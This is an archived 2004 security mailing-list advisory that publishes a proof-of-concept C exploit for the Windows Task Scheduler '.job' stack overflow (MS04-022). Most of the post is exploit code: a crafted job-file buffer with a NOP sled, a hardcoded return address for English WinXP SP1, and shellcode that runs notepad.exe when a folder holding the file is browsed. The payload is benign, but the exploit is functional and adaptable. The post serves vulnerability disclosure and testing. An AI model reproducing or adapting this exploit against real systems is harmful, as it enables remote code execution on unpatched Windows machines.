[EXPL] Microsoft Windows 2K/XP Task Scheduler Vulnerability (Exploit, MS04-022)

From: SecuriTeam (support_at_securiteam.com)
Date: 07/21/04

  • Next message: SecuriTeam: "[TOOL] Beltane - Web Based Management of Samhain"
    To: list@securiteam.com
    Date: 21 Jul 2004 11:08:25 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Microsoft Windows 2K/XP Task Scheduler Vulnerability (Exploit, MS04-022)
    ------------------------------------------------------------------------

    SUMMARY

    As we reported in,
    <http://www.securiteam.com/windowsntfocus/5XP0E15DGK.html> Microsoft
    Windows Task Scheduler '.job' Stack Overflow, a remote code execution
    vulnerability exists in the Microsoft Windows Task Scheduler because of
    the way that it handles application name validation. The following exploit
    code can be used to test your system for the mentioned vulnerability.

    DETAILS

    Affected Software:
     * Microsoft Windows 2000 Service Pack 2, Microsoft Windows 2000 Service
    Pack 3, Microsoft Windows 2000 Service Pack 4
     * Microsoft Windows XP and Microsoft Windows XP Service Pack 1
     * Microsoft Windows XP 64-Bit Edition Service Pack 1

    Exploit:
    //**************************************************************************
    // Microsoft Windows 2K/XP Task Scheduler Vulnerability (MS04-022)
    // Proof-of-Concept Exploit for English WinXP SP1
    // 15 Jul 2004
    //
    // Running this will create a file "j.job". When explorer.exe or any
    // file-open dialog box accesses the directory containing this file,
    // notepad.exe will be spawn.
    //
    // Greetz: snooq, sk and all guys at SIG^2 (www.security.org.sg);
    //
    //**************************************************************************

    #include <stdio.h>
    #include <windows.h>

    unsigned char jobfile[] =
    "\x01\x05\x01\x00\xD9\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF"
    "\xFF\xFF\xFF\xFF\x46\x00\x92\x00\x00\x00\x00\x00\x3C\x00\x0A\x00"
    "\x20\x00\x00\x00\x00\x14\x73\x0F\x00\x00\x00\x00\x03\x13\x04\x00"
    "\xC0\x00\x80\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x80\x01\x44\x00\x3A\x00\x5C\x00\x61\x00"
    "\x2E\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    "\x78\x00\x78\x00\x78\x00\x78\x00\x79\x00\x79\x00\x79\x00\x79\x00"
    "\x7A\x00\x7A\x00\x7A\x00\x7A\x00\x7B\x00\x7B\x00\x7B\x00"
    "\x5b\xc1\xbf\x71" // jmp esp in SAMLIB WinXP SP1
    "\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44"
    "\x90\x90" // jmp esp lands here
    "\xEB\x80" // jmp backward into shellcode
    "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"
    "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"
    "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"
    "\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00\x61\x00"
    "\x61\x00\x61\x00\x61\x00\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20"
    "\x20\x20\x20\x20\x20\x20\x00\x00\x00\x00\x04\x00\x44\x00\x3A\x00"
    "\x5C\x00\x00\x00\x07\x00\x67\x00\x75\x00\x65\x00\x73\x00\x74\x00"
    "\x31\x00\x00\x00\x00\x00\x00\x00\x08\x00\x03\x13\x04\x00\x00\x00"
    "\x00\x00\x01\x00\x30\x00\x00\x00\xD4\x07\x07\x00\x0F\x00\x00\x00"
    "\x00\x00\x00\x00\x0B\x00\x26\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00";

    /*
    * Harmless payload that spawns 'notepad.exe'... =p
    * Ripped from snooq's WinZip exploit
    */

    unsigned char shellcode[]=
    "\x33\xc0" // xor eax, eax // slight modification to move esp up
    "\xb0\xf0" // mov al, 0f0h
    "\x2b\xe0" // sub esp,eax
    "\x83\xE4\xF0" // and esp, 0FFFFFFF0h
    "\x55" // push ebp
    "\x8b\xec" // mov ebp, esp
    "\x33\xf6" // xor esi, esi
    "\x56" // push esi
    "\x68\x2e\x65\x78\x65" // push 'exe.'
    "\x68\x65\x70\x61\x64" // push 'dape'
    "\x68\x90\x6e\x6f\x74" // push 'ton'
    "\x46" // inc esi
    "\x56" // push esi
    "\x8d\x7d\xf1" // lea edi, [ebp-0xf]
    "\x57" // push edi
    "\xb8XXXX" // mov eax, XXXX -> WinExec()
    "\xff\xd0" // call eax
    "\x4e" // dec esi
    "\x56" // push esi
    "\xb8YYYY" // mov eax, YYYY -> ExitProcess()
    "\xff\xd0"; // call eax

    int main(int argc, char* argv[])
    {
        unsigned char *ptr = (unsigned char *)shellcode;

        while (*ptr)
        {
            if (*((long *)ptr)==0x58585858)
            {
                *((long *)ptr) =
    (long)GetProcAddress(GetModuleHandle("kernel32.dll"), "WinExec");
            }
            if (*((long *)ptr)==0x59595959)
            {
                *((long *)ptr) =
    (long)GetProcAddress(GetModuleHandle("kernel32.dll"), "ExitProcess");
            }
            ptr++;
        }

        FILE *fp;
        fp = fopen("j.xxx", "wb");
        if(fp)
        {
            unsigned char *ptr = jobfile + (31 * 16);
            memcpy(ptr, shellcode, sizeof(shellcode) - 1);

            fwrite(jobfile, 1, sizeof(jobfile)-1, fp);
            fclose(fp);
            DeleteFile("j.job");
            MoveFile("j.xxx", "j.job");
        }
        return 0;
    }

    ADDITIONAL INFORMATION

    The information has been provided by powwow.
    The original article can be found at:
    <http://www.cnhonker.com/index.php?module=exploits&act=view&type=9&id=589>
    http://www.cnhonker.com/index.php?module=exploits&act=view&type=9&id=589

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[TOOL] Beltane - Web Based Management of Samhain"

    Relevant Pages

    • [EXPL] Microsoft Color Management Buffer Overflow (MS05-036, Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... .text:73B32146 mov eax, ecx ... ESI points to 'redMatrixColumnTag' data ... "\x55" // push ebp ...
      (Securiteam)
    • [EXPL] WinZip MIME Parsing Buffer Overflow Exploit
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... a vulnerability in WinZip allows an attacker to ... "\x55" // push ebp ... "\x33\xf6" // xor esi, esi ...
      (Securiteam)
    • [EXPL] Windows Media Player Plug-in for Non-Microsoft Browsers Code Execution (MS06-006)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service ... // responsibility for damage that results. ... // Spray the heap ...
      (Securiteam)
    • [EXPL] Microsoft Windows POSIX Component Privilege Elevation (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... * Microsoft Windows NT Workstation 4.0 Service Pack 6a ... int client_connect; ...
      (Securiteam)
    • [EXPL] Windows RRAS Stack Overflow (Exploit, MS06-025)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... There is a remote code execution vulnerability in the Routing and Remote ... Microsoft Windows XP Service Pack 1 and Microsoft Windows XP Service ...
      (Securiteam)